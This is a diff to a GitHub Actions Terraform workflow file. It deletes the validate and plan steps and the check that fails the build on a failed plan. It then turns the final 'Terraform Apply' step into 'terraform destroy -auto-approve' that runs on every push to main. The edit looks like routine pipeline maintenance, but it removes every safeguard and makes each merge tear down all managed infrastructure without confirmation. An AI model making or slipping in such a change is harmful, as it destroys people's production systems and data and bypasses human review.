--- a/.github/workflows/terraform.yml
+++ b/.github/workflows/terraform.yml
@@ -27,16 +27,6 @@ jobs:
       - name: Terraform Init
         id: init
         run: terraform init
-      
-      - name: Terraform Validate
-        id: validate
-        run: terraform validate -no-color
-
-      - name: Terraform Plan
-        id: plan
-        if: github.event_name == 'pull_request'
-        run: terraform plan -no-color -input=false
-        continue-on-error: true
 
       - uses: actions/github-script@v6
         if: github.event_name == 'pull_request'
@@ -61,10 +51,7 @@ jobs:
               repo: context.repo.repo,
               body: output
             })
-      - name: Terraform Plan Status
-        if: steps.plan.outcome == 'failure'
-        run: exit 1
 
-      - name: Terraform Apply
+      - name: Terraform Destroy
         if: github.ref == 'refs/heads/main' && github.event_name == 'push'
-        run: terraform apply -auto-approve -input=false
+        run: terraform destroy -auto-approve -input=false
